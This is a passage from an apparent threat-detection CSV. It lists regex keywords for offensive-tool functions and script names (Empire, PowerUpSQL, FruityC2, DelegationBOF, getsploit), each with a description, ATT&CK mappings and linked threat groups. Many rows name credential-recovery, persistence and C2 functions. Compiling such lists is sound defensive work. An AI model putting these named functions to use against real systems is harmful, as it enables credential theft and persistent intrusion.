the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Get-SiteListPassword.ps1 PowerUp.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46236" "*Get-SiteListPassword.ps1*",".{0,1000}Get\-SiteListPassword\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - 
T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","46238" "*Get-SMBSigning -DelayJitter *",".{0,1000}Get\-SMBSigning\s\-DelayJitter\s.{0,1000}","offensive_tool_keyword","CheckSMBSigning","Checks for SMB signing disabled on all hosts in the network","T1018 - T1550","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/Leo4j/CheckSMBSigning","1","0","N/A","N/A","6","1","8","1","2023-10-13T11:55:33Z","2023-05-17T11:47:52Z","46239" "*getsploit*",".{0,1000}getsploit.{0,1000}","offensive_tool_keyword","getsploit","Command line search and download tool for Vulners Database inspired by searchsploit. It allows you to search online for the exploits across all the most popular collections: Exploit-DB. Metasploit. Packetstorm and others. 
The most powerful feature is immediate exploit source download right in your working path.","T1583 - T1584 - T1586","TA0007","N/A","N/A","Exploitation tool","https://github.com/vulnersCom/getsploit","1","0","N/A","N/A","N/A","10","1762","245","2024-06-09T20:15:41Z","2017-06-04T09:31:44Z","46240" "*Get-SPN.ps1*",".{0,1000}Get\-SPN\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1114","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black 
Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46241" "*Get-SPN-FruityC2.ps1*",".{0,1000}Get\-SPN\-FruityC2\.ps1.{0,1000}","offensive_tool_keyword","FruityC2","FruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","1","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","46242" "*get-spns All*",".{0,1000}get\-spns\sAll.{0,1000}","offensive_tool_keyword","DelegationBOF","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. and Unconstrained Delegation checks.","T1098 - T1214 - T1552","TA0006","N/A","N/A","Credential Access","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","N/A","N/A","N/A","10","141","23","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z","46243" "*get-spns ASREP*",".{0,1000}get\-spns\sASREP.{0,1000}","offensive_tool_keyword","DelegationBOF","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. and Unconstrained Delegation checks.","T1098 - T1214 - T1552","TA0006","N/A","N/A","Credential Access","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","N/A","N/A","N/A","10","141","23","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z","46244" "*get-spns spns*",".{0,1000}get\-spns\sspns.{0,1000}","offensive_tool_keyword","DelegationBOF","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. 
and Unconstrained Delegation checks.","T1098 - T1214 - T1552","TA0006","N/A","N/A","Credential Access","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","N/A","N/A","N/A","10","141","23","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z","46245" "*Get-SQLC2Agent*",".{0,1000}Get\-SQLC2Agent.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","46246" "*Get-SQLC2Command *",".{0,1000}Get\-SQLC2Command\s.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. 
PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","0","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","46247" "*Get-SQLC2ComputerNameFromInstance*",".{0,1000}Get\-SQLC2ComputerNameFromInstance.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","46248" "*Get-SQLC2Connection*",".{0,1000}Get\-SQLC2Connection.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. 
PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","46249" "*Get-SQLC2Query*",".{0,1000}Get\-SQLC2Query.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","46250" "*Get-SQLC2Result*",".{0,1000}Get\-SQLC2Result.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. 
PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","46251" "*Get-SQLDomainPasswordsLAPS*",".{0,1000}Get\-SQLDomainPasswordsLAPS.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","46252" "*Get-SQLFuzzDatabaseName*",".{0,1000}Get\-SQLFuzzDatabaseName.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. 
PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","46253" "*Get-SQLFuzzDomainAccount*",".{0,1000}Get\-SQLFuzzDomainAccount.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","46254" "*Get-SQLFuzzObjectName*",".{0,1000}Get\-SQLFuzzObjectName.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. 
PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","46255" "*Get-SQLFuzzServerLogin'*",".{0,1000}Get\-SQLFuzzServerLogin\'.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","46256" "*Get-SQLInstanceDomain*",".{0,1000}Get\-SQLInstanceDomain.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Get-SQLInstanceDomain.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46257" "*Get-SQLInstanceDomain.ps1*",".{0,1000}Get\-SQLInstanceDomain\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1082","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46258" "*Get-SQLLocalAdminCheck*",".{0,1000}Get\-SQLLocalAdminCheck.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. 
PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","46259" "*Get-SQLOleDbProvder*",".{0,1000}Get\-SQLOleDbProvder.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","46260" "*Get-SQLPersistRegDebugger*",".{0,1000}Get\-SQLPersistRegDebugger.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. 
PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","46261" "*Get-SQLPersistRegRun*",".{0,1000}Get\-SQLPersistRegRun.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","46262" "*Get-SQLPersistTriggerDDL*",".{0,1000}Get\-SQLPersistTriggerDDL.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. 
PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","46263" "*Get-SQLQuery.ps1*",".{0,1000}Get\-SQLQuery\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black 
Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","46264" "*Get-SQLRecoverPwAutoLogon*",".{0,1000}Get\-SQLRecoverPwAutoLogon.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","46265" "*Get-SQLServerCredential*",".{0,1000}Get\-SQLServerCredential.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. 
PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","46266" "*Get-SqlServerLinkCrawl*",".{0,1000}Get\-SqlServerLinkCrawl.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Automatically find all linked databases","T1550 - T1555 - T1212 - T1558","N/A","N/A","Black Basta","Exploitation tool","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","46267" "*Get-SQLServerLinkCrawl*",".{0,1000}Get\-SQLServerLinkCrawl.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","46268" "*Get-SQLServerLoginDefaultPw*",".{0,1000}Get\-SQLServerLoginDefaultPw.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - 